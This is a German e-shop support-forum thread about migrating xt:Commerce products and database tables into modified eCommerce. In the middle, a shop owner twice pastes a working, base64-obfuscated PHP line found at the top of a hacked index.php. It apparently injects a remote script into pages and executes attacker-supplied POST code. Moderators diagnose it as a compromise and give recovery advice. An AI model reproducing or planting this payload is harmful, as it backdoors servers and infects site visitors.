Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Produkte von xt:Commerce in modified eCommerce Shopsoftware übernehmen

    web28

    • modified Team
    • Beiträge: 9.404
    Hier eine Datei mit der Du mit phpMyAdmin die alten Sprach-Ids wiederherstellen kannst.

    Sprach-IDs Modified:
    1 Deutsch
    2 Englisch

    Es werden die Sprach-Ids in den Tabellen "content_manager" und "customers_status" getauscht!

    Nach der Änderung:
    1 Englisch
    2 Deutsch

    ACHTUNG: Nur bei einer frischen Installation ausführen, vorher die Datenbank sichern

    sicalord

    • Schreiberling
    • Beiträge: 265
    Hallo Freunde!

    Habe nun fast alles geschaft um den Hack zu entkommen aber irgendwie scheint es mich zu verfolgen.

    Nachdem ich alles erlädigt habe und ich nun meine Seite hochgeladen habe und es öffnete passierte folgendes

    - ich bekam eine meldung:  could not lounch acrobat!

    darauf hin habe ich mir den quelltext angeschaut im editor und fnd dies:

    Code: PHP  [Auswählen]
    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbXNrJykpe2Z1bmN0aW9uIG1zaygkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXpaMk5sYm5SbGNpNXlkUzk0WWpRNEwxOXdhUzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIG1zazIoJGEsJGIsJGMsJGQpe2dsb2JhbCRtc2sxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRtc2sxKSljYWxsX3VzZXJfZnVuYygkbXNrMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nbXNrJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbXNrJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG1za2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ21zazInKSkhPSdtc2syJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php

    /* -----------------------------------------------------------------------------------------
       $Id: index.php 1321 2005-10-26 20:55:07Z mz $  

       XT-Commerce - community made shopping
       http://www.(( Wir dulden keine kommerziellen Werbelinks - Bitte Forenregeln beachten! ))

       Copyright (c) 2003 XT-Commerce
       -----------------------------------------------------------------------------------------
       based on:
       (c) 2000-2001 The Exchange Project  (earlier name of osCommerce)
       (c) 2002-2003 osCommerce(default.php,v 1.84 2003/05/07); www.oscommerce.com
       (c) 2003      nextcommerce (default.php,v 1.13 2003/08/17); www.nextcommerce.org

       Released under the GNU General Public License
       -----------------------------------------------------------------------------------------
       Third Party contributions:
       Enable_Disable_Categories 1.3                Autor: Mikel Williams | mikel@ladykatcostumes.com
       Customers Status v3.x  (c) 2002-2003 Copyright Elari elari@free.fr | www.unlockgsm.com/dload-osc/ | CVS : http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/elari/?sortby=date#dirlist

       Released under the GNU General Public License
       ---------------------------------------------------------------------------------------*/

    was zum teufel ist das?

    und wie kann ich endlich wieder meine seite vernormalisieren??

    hier ein link zur seite:

    http://www.efelisan.de/shop

    und wirklich freunde ich habe es versucht selbst zu lösen aber dafür fehlen mir wohl doch die kentnisse und das fachwissen.

    Danke im vorraus

    sicalord

    • Schreiberling
    • Beiträge: 265
    Hallo Freunde!

    Nach std. langer fummelei habe ich es nun geschafft.

    so dachte ich es. aber als ich meine seite aufmachen wollte bekam ich eine warnmeldun :

    acrobat could not lounch!

    das hat mich stutzig gemacht,

    als ich dan im editor mir die index.php angesehen habe dachte ich wasn nun los

    ich fand dies ganz oben:

    Code: PHP  [Auswählen]
    <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbXNrJykpe2Z1bmN0aW9uIG1zaygkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXpaMk5sYm5SbGNpNXlkUzk0WWpRNEwxOXdhUzV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIG1zazIoJGEsJGIsJGMsJGQpe2dsb2JhbCRtc2sxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRtc2sxKSljYWxsX3VzZXJfZnVuYygkbXNrMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKWFzJHYpaWYoKCRhPSR2WyduYW1lJ10pPT0nbXNrJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbXNrJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JG1za2w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ21zazInKSkhPSdtc2syJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php

    /* -----------------------------------------------------------------------------------------
       $Id: index.php 1321 2005-10-26 20:55:07Z mz $  

       XT-Commerce - community made shopping
       http://www.(( Wir dulden keine kommerziellen Werbelinks - Bitte Forenregeln beachten! ))

       Copyright (c) 2003 XT-Commerce
       -----------------------------------------------------------------------------------------
       based on:
       (c) 2000-2001 The Exchange Project  (earlier name of osCommerce)
       (c) 2002-2003 osCommerce(default.php,v 1.84 2003/05/07); www.oscommerce.com
       (c) 2003      nextcommerce (default.php,v 1.13 2003/08/17); www.nextcommerce.org

       Released under the GNU General Public License
       -----------------------------------------------------------------------------------------
       Third Party contributions:
       Enable_Disable_Categories 1.3                Autor: Mikel Williams | mikel@ladykatcostumes.com
       Customers Status v3.x  (c) 2002-2003 Copyright Elari elari@free.fr | www.unlockgsm.com/dload-osc/ | CVS : http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/elari/?sortby=date#dirlist

       Released under the GNU General Public License
       ---------------------------------------------------------------------------------------*/

    Freunde ich drehe fast schon durch habe fast ne woche gebraucht um den virus oder hack oder was auch immer loszuwerden und kaum bin ich fertig kommt so ne sch...

    was kann das nur sein und wie werde ich endgültig diese sch... los!

    ich habe alles versucht aber anschein ist mein fachwissen nicht so gross und auch meine php etc kenntnisse sind nicht die besten.

    freunde, was kann ich machen??

    danke im vorraus.

    Tomcraft

    • modified Team
    • Gravatar
    • Beiträge: 46.369
    • Geschlecht:
    Ich würde mich mal an den Provider wenden, der soll deinen Account mal überprüfen, wer da so zugreift, bzw. ggf. den Account zurück setzen. Da hat dir wieder jemand Code untergejubelt! ;-)

    Dein Hacking-Problem wurde wohl schon ausgenutzt um an Zugangsdaten zu  gelangen.

    Siehe: Hilfe mein standard XTC 3.04 SP2.1 Shop wurde gehackt, kann jemand helfen?

    Grüße

    Torsten

    sicalord

    • Schreiberling
    • Beiträge: 265
    ja ok das muss ich dan wohl machen. eine frage eben noch schnell. sind die sicherheitsupdates den schon installiert im trunc oder muss ich das manuell machen??

    gruss und danke nochmal

    Tomcraft

    • modified Team
    • Gravatar
    • Beiträge: 46.369
    • Geschlecht:
    Im Trunk sind alle Updates bereits enthalten.

    Ich empfehle dir jedoch die 1.02 einzusetzen! Denn dafür wird es ein Update-Paket geben, für den Trunk nicht.

    Grüße

    Torsten

    sicalord

    • Schreiberling
    • Beiträge: 265
    ach echt ist nicht dein ernst kann ich denn von trunk auf 1.02 umsteigen?

    Tomcraft

    • modified Team
    • Gravatar
    • Beiträge: 46.369
    • Geschlecht:
    Doch ist mein ernst, daher sagen wir auch immer Entwicklerversion dazu!

    Hat es dich nicht gewundert, dass der Trunk nicht auf der Download-Seite aufgeführt ist?

    Downgrade auf 1.02 ist möglich, einfach alle Dateien ausser die configures überschreiben lassen.

    Grüße

    Torsten

    Koenig

    • Neu im Forum
    • Beiträge: 42
    Hallo,
    ich möchte die Artikel aus dem alten Shop xt:Commerce v3.0.4 SP2.1 in den neuen modified eCommerce Shopsoftware Shop importieren. Die "products_xxx" Tabellen aus der alten Datenbank wurden in die neue Datenbank importiert. Danach erhalte ich folgende Fehlermeldung (siehe unten).
    PS: es wurden bereits mehrere Module erfolgreich installiert.
    U.a. Lagerbestandswarnung mit Mailversand. Hier vermute ich den Fehler.
    Weiß aber leider nicht wie der Fehler behoben werden kann.

    Code: PHP  [Auswählen]
    1054 - Unknown column 'stock_mail' in 'field list'

    SELECT products_id, products_quantity, products_model, products_price, stock_mail FROM products WHERE products_quantity> '2' AND stock_mail = '1'

    [XT SQL Error]

    Tomcraft

    • modified Team
    • Gravatar
    • Beiträge: 46.369
    • Geschlecht:
    Du musst natürlich die Datenbankerweiterungen der Module wieder auf die "products_xxx" Tabellen anwenden, wenn du deine Tabellen mit denen aus dem alten xt:Commerce Shop überschreibst! :!:

    Grüße

    Torsten

    Koenig

    • Neu im Forum
    • Beiträge: 42
    Hallo Torsten,

    danke damit konnte ich etwas anfangen und den Fehler beheben.
    Artikel sind jetzt im Shop. Die Umlaute werden aber leider nicht korrekt angezeigt.
    Wie kann ich das Problem lösen? Hab die "products_xxx" zum Testen in zwei Shops importiert.
    Bei dem einen Shop werden die Umlaute korrekt angezeigt und bei dem anderen leider nicht.

    Tomcraft

    • modified Team
    • Gravatar
    • Beiträge: 46.369
    • Geschlecht:
    Du musst beim Export/Import auf den Charset (Zeichensatz) aufpassen, sonst gibt es eben diese Umlautprobleme, wenn du als "utf-8" exportierst und dann aber als "latin1" importierst.

    Grüße

    Torsten

               
    anything